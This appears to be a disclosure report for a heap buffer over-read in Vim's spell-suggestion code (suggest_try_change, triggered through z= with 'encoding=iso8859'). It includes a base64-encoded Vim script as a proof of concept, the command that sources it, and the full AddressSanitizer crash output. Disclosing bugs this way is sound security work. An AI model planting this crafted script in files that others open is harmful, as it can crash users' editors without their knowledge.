Heap-based Buffer Overflow occurs in vim in vim/vim
Valid
Reported on
Mar 12th 2022
Description
Heap-based buffer overflow (a 1-byte out-of-bounds READ inside strlen()) in suggest_try_change(), src/spellsuggest.c:1188, reached through the `z=` spell-suggestion command (nv_zet → spell_suggest → spell_find_suggest → spell_suggest_intern). The over-read buffer is the 312-byte copy made by vim_strsave() in spell_suggest() (src/spellsuggest.c:540); the faulting read is 0 bytes past its end, which suggests strlen() is walking a pointer into that buffer without finding a NUL terminator before the allocation boundary. The PoC sets 'encoding=iso8859' first, so the bug appears to depend on single-byte encoding handling in the suggestion code (to be confirmed against the fix).
commit : d0b7bfa95798f5ec743d8afffbffb83aeac823da
Proof of Concept
$ echo -ne "c2UgZW5jb2Rpbmc9aXNvODg1OQpub3JtMFIwMDAwMDAwMDAwMApzaWwwbm9ybRYwCmZ1IFIoKQpz
aWwhbm9ybRZpMDAwMDApCmNhbCBSKCkKbm9ybTF6PQplbmRmCmNhbCBSKCk=" | base64 -d > poc
$ # vim built with AddressSanitizer (e.g. CFLAGS="-fsanitize=address -g"); the binary below is src/vim.asan
$ ./src/vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!"
=================================================================
==127228==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6120000212f8 at pc 0x000000430f36 bp 0x7ffd494cbe70 sp 0x7ffd494cb630
READ of size 1 at 0x6120000212f8 thread T0
#0 0x430f35 in strlen (/home/alkyne/vim-debug/src/vim.asan+0x430f35)
#1 0xbb0404 in suggest_try_change /home/alkyne/vim-debug/src/spellsuggest.c:1188:42
#2 0xbaa268 in spell_suggest_intern /home/alkyne/vim-debug/src/spellsuggest.c:1004:5
#3 0xba6e13 in spell_find_suggest /home/alkyne/vim-debug/src/spellsuggest.c:879:6
#4 0xba37da in spell_suggest /home/alkyne/vim-debug/src/spellsuggest.c:550:5
#5 0x922c10 in nv_zet /home/alkyne/vim-debug/src/normal.c:2998:7
#6 0x8f406d in normal_cmd /home/alkyne/vim-debug/src/normal.c:930:5
#7 0x6f763d in exec_normal /home/alkyne/vim-debug/src/ex_docmd.c:8670:6
#8 0x6f7243 in exec_normal_cmd /home/alkyne/vim-debug/src/ex_docmd.c:8633:5
#9 0x6f6fa3 in ex_normal /home/alkyne/vim-debug/src/ex_docmd.c:8551:6
#10 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#11 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#12 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#13 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#14 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#15 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#16 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#17 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#18 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#19 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#20 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#21 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#22 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#23 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#24 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#25 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#26 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#27 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#28 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#29 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#30 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#31 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#32 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#33 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#34 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#35 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#36 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#37 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#38 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#39 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#40 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#41 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#42 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#43 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#44 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#45 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#46 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#47 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#48 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#49 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#50 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#51 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#52 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#53 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#54 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#55 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#56 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#57 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#58 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#59 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#60 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#61 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#62 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#63 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#64 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#65 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#66 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#67 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#68 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#69 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#70 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#71 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#72 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#73 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#74 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#75 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#76 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#77 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#78 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#79 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#80 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#81 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#82 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#83 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#84 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#85 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#86 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#87 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#88 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#89 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#90 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#91 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#92 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#93 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#94 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#95 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#96 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#97 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#98 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#99 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#100 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#101 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#102 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#103 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#104 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#105 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#106 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#107 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#108 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#109 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#110 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#111 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#112 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#113 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#114 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#115 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#116 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#117 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#118 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#119 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#120 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#121 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#122 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#123 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#124 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#125 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#126 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#127 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#128 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#129 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#130 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#131 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#132 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#133 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#134 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#135 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#136 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#137 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#138 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#139 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#140 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#141 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#142 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#143 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#144 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#145 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#146 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#147 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#148 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#149 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#150 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#151 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#152 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#153 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#154 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#155 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#156 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#157 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#158 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#159 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#160 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#161 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#162 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#163 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#164 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#165 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#166 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#167 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#168 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#169 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#170 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#171 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#172 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#173 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#174 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#175 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#176 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#177 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#178 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#179 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#180 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#181 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#182 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#183 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#184 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#185 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#186 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#187 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#188 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#189 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#190 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#191 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#192 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#193 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#194 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#195 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#196 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#197 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#198 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#199 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#200 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#201 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#202 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#203 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#204 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#205 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#206 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#207 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#208 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#209 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#210 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#211 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#212 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#213 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#214 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#215 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#216 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#217 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#218 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#219 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#220 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#221 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#222 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#223 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#224 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#225 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#226 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#227 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#228 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#229 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#230 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#231 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#232 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#233 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#234 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#235 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#236 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#237 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#238 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#239 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#240 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#241 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#242 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#243 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#244 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#245 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#246 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#247 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#248 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#249 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#250 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
0x6120000212f8 is located 0 bytes to the right of 312-byte region [0x6120000211c0,0x6120000212f8)
allocated by thread T0 here:
#0 0x499c8d in malloc (/home/alkyne/vim-debug/src/vim.asan+0x499c8d)
#1 0x4cb0e0 in lalloc /home/alkyne/vim-debug/src/alloc.c:248:11
#2 0x4cb039 in alloc /home/alkyne/vim-debug/src/alloc.c:151:12
#3 0xbca715 in vim_strsave /home/alkyne/vim-debug/src/strings.c:27:9
#4 0xba364f in spell_suggest /home/alkyne/vim-debug/src/spellsuggest.c:540:12
#5 0x922c10 in nv_zet /home/alkyne/vim-debug/src/normal.c:2998:7
#6 0x8f406d in normal_cmd /home/alkyne/vim-debug/src/normal.c:930:5
#7 0x6f763d in exec_normal /home/alkyne/vim-debug/src/ex_docmd.c:8670:6
#8 0x6f7243 in exec_normal_cmd /home/alkyne/vim-debug/src/ex_docmd.c:8633:5
#9 0x6f6fa3 in ex_normal /home/alkyne/vim-debug/src/ex_docmd.c:8551:6
#10 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#11 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#12 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#13 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#14 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#15 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#16 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#17 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#18 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#19 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#20 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#21 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#22 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#23 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#24 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#25 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#26 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#27 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#28 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#29 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/alkyne/vim-debug/src/vim.asan+0x430f35) in strlen
Shadow bytes around the buggy address:
0x0c247fffc200: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fffc210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fffc220: 00 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fa
0x0c247fffc230: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fffc240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c247fffc250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]
0x0c247fffc260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc2a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==127228==ABORTING
Impact
Impact as demonstrated by the sanitizer output: a 1-byte heap out-of-bounds read (READ of size 1 in strlen(), 0 bytes past a 312-byte region). The minimum consequence is a crash (denial of service) when a user sources or opens a crafted script that triggers spell suggestion with 'encoding=iso8859'. Whether the over-read can be turned into memory disclosure or further corruption has not been shown here and would need separate analysis; a non-ASAN build may not crash at all. Exploitation requires the victim to execute attacker-controlled Vim script or normal-mode commands (the PoC is sourced with -S), so the attack surface is opening/sourcing untrusted files.
The POC can be simplified, there is no need for calling the function recursively.